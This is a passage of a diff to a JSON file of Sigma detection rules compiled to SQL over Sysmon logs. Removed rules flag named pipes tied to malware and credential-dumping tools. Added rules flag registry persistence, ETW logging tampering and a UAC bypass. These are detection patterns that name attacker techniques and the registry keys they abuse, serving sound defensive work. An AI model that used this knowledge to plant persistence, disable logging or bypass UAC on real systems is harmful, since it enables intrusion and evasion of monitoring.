Policy\\\\Scripts\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logoff%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\PLAP Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Provider Filters%' ESCAPE '\\')) AND NOT ((Details = '(Empty)' OR TargetObject LIKE '%\\\\NgcFirst\\\\ConsecutiveSwitchCount' ESCAPE '\\' OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\devicecensus.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\winsat.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\KeePass Password Safe 2\\\\ShInstUtil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Everything\\\\Everything.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\LogonUI.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{D6886603-9D2F-4EB2-B667-1971041FA96B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{BEC09223-B018-416D-A0AC-523971B639F5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\regsvr32.exe' ESCAPE '\\' AND TargetObject LIKE '%DropboxExt%' ESCAPE '\\' AND Details LIKE '%A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Opera Browser Assistant' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Opera\\\\assistant\\\\browser\\_assistant.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\iTunesHelper' ESCAPE '\\' AND Details LIKE '\"C:\\\\Program Files\\\\iTunes\\\\iTunesHelper.exe\"' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\zoommsirepair' ESCAPE '\\' AND Details LIKE '\"C:\\\\Program Files\\\\Zoom\\\\bin\\\\installer.exe\" /repair' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Greenshot' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Greenshot\\\\Greenshot.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\GoogleDriveFS' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\GoogleDriveFS.exe%' ESCAPE '\\') OR (TargetObject LIKE '%GoogleDrive%' ESCAPE '\\' AND Details IN ('{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}', '{A8E52322-8734-481D-A7E2-27B309EF8D56}', '{C973DA94-CBDF-4E77-81D1-E5B794FBD146}', '{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}')) OR ((Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \"C:\\\\Users\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\') AND Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{%' ESCAPE '\\' AND Details LIKE '%\\\\AppData\\\\Local\\\\Package Cache\\\\{%' ESCAPE '\\' AND Details LIKE '%}\\\\python-%' ESCAPE '\\' AND Details LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND Details LIKE '%\\\\Microsoft\\\\Teams\\\\Update.exe --processStart %' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\userinit.exe' ESCAPE '\\' AND Details = 'ctfmon.exe /n') OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\Setup\\\\%' ESCAPE '\\' AND (Details LIKE '\"C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR Details LIKE '\"C:\\\\Program Files (x86)\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR Details LIKE '{472083B0-C522-11CF-8763-00608CC02F24}' ESCAPE '\\')) OR ((Image LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR Image LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\aurora-dashboard' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Aurora-Agent\\\\tools\\\\aurora-dashboard.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Everything' ESCAPE '\\' AND Details LIKE '%\\\\Everything\\\\Everything.exe\" -startup' ESCAPE '\\')))" ], - "filename": "pipe_created_psexec_pipes_artifacts.yml" + "filename": "registry_set_asep_reg_keys_modification_currentversion.yml" }, { - "title": "Malicious Named Pipe", - "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", - "status": "test", - "description": "Detects the creation of a named pipe used by known APT malware", - "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", + "title": "Potential Persistence Via Mpnotify", + "id": "92772523-d9c1-4c93-9547-b0ca500baba3", + "status": "experimental", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" ], - "filename": "pipe_created_mal_namedpipes.yml" + "filename": "registry_set_persistence_mpnotify.yml" }, { - "title": "Cred Dump-Tools Named Pipes", - "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", - "status": "test", - "description": "Detects well-known credential dumping tools execution via specific named pipes", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "ETW Logging Disabled For SCM", + "id": "4f281b83-0200-4b34-bf35-d24687ea57c2", + "status": "experimental", + "description": "Detects changes to the \"TracingDisabled\" key in order to disable ETW logging for services.exe (SCM)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Unknown" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Tracing\\\\SCM\\\\Regular\\\\TracingDisabled' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "pipe_created_cred_dump_tools_named_pipes.yml" + "filename": "registry_set_services_etw_tamper.yml" }, { - "title": "Koh Default Named Pipes", - "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", - "status": "experimental", - "description": "Detects creation of default named pipes used by the Koh tool", + "title": "Potential Persistence Via Event Viewer Events.asp", + "id": "a1e11042-a74a-46e6-b07c-c4ce8ecc239b", + "status": "test", + "description": "Detects potential registry persistence technique using the Event Viewer \"Events.asp\" technique", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1528", - "attack.t1134.001" + "attack.persistence", + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionURL%' ESCAPE '\\') AND NOT ((Image LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram' ESCAPE '\\' AND Details LIKE '\\%\\%SystemRoot\\%\\%\\\\PCHealth\\\\HelpCtr\\\\Binaries\\\\HelpCtr.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgramCommandLineParameters' ESCAPE '\\' AND Details LIKE '-url hcp://services/centers/support_topic=\\%\\%s' ESCAPE '\\') OR (Details = 'http://go.microsoft.com/fwlink/events.asp') OR (Details = '(Empty)')))" ], - "filename": "pipe_created_koh_default_pipe.yml" + "filename": "registry_set_persistence_event_viewer_events_asp.yml" }, { - "title": "PowerShell Execution Via Named Pipe", - "id": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", - "status": "test", - "description": "Detects execution of PowerShell via creation of named pipe starting with PSHost", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Modification of Explorer Hidden Keys", + "id": "5a5152f1-463f-436b-b2f5-8eceb3964b42", + "status": "experimental", + "description": "Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSHost%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "pipe_created_powershell_execution_pipe.yml" + "filename": "registry_set_hide_file.yml" }, { - "title": "ADFS Database Named Pipe Connection", - "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", - "status": "test", - "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "ETW Logging Disabled For rpcrt4.dll", + "id": "90f342e1-1aaa-4e43-b092-39fda57ed11e", + "status": "experimental", + "description": "Detects changes to the \"ExtErrorInformation\" key in order to disable ETW logging for rpcrt4.dll", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ - "Processes in the filter condition" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR Image LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR Image LIKE '%\\\\tssdis.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\Rpc\\\\ExtErrorInformation' ESCAPE '\\' AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000002)'))" ], - "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" + "filename": "registry_set_rpcrt4_etw_tamper.yml" }, { - "title": "EfsPotato Named Pipe", - "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "title": "Service Binary in Uncommon Folder", + "id": "277dc340-0540-42e7-8efb-5ff460045e07", "status": "experimental", - "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "description": "Detect the creation of a service with a service binary located in a uncommon directory", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\')))" ], - "filename": "pipe_created_efspotato_namedpipe.yml" + "filename": "registry_set_creation_service_uncommon_folder.yml" }, { - "title": "CobaltStrike Named Pipe Patterns", - "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", - "status": "test", - "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", - "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "title": "Persistence Via New SIP Provider", + "id": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", + "status": "experimental", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1553.003" ], "falsepositives": [ - "Chrome instances using the exact same pipe name \"mojo.something\"" + "Legitimate SIP being registered by the OS or different software." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Dll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\$DLL%' ESCAPE '\\')) AND NOT ((Details IN ('WINTRUST.DLL', 'mso.dll')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CryptSIPDll%' ESCAPE '\\' AND Details LIKE 'C:\\\\Windows\\\\System32\\\\PsfSip.dll' ESCAPE '\\')))" ], - "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" + "filename": "registry_set_sip_persistence.yml" }, { - "title": "PsExec Tool Execution From Suspicious Locations - PipeName", - "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", - "status": "experimental", - "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Keyboard Layout Load", + "id": "34aa0252-6039-40ff-951f-939fd6ce47d8", + "status": "test", + "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Rare legitimate use of psexec from the locations mentioned above" + "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Keyboard Layout\\\\Preload\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Keyboard Layout\\\\Substitutes\\\\%' ESCAPE '\\') AND (Details LIKE '%00000429%' ESCAPE '\\' OR Details LIKE '%00050429%' ESCAPE '\\' OR Details LIKE '%0000042a%' ESCAPE '\\'))" ], - "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" + "filename": "registry_set_susp_keyboard_layout_load.yml" }, { - "title": "DiagTrackEoP Default Named Pipe", - "id": "1f7025a6-e747-4130-aac4-961eb47015f1", - "status": "experimental", - "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Bypass UAC Using DelegateExecute", + "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", + "status": "test", + "description": "Bypasses User Account Control using a fileless method", + "author": "frack113", "tags": [ - "attack.privilege_escalation" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '%thisispipe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND Details = '(Empty)')" ], - "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + "filename": "registry_set_bypass_uac_using_delegateexecute.yml" }, { - "title": "Turla Group Named Pipes", - "id": "739915e4-1e70-4778-8b8a-17db02f66db1", - "status": "test", - "description": "Detects a named pipe used by Turla group samples", - "author": "Markus Neis", + "title": "Blue Mockingbird - Registry", + "id": "92b0b372-a939-44ed-a11b-5136cf680e27", + "status": "experimental", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.g0010", "attack.execution", - "attack.t1106" + "attack.t1112", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName 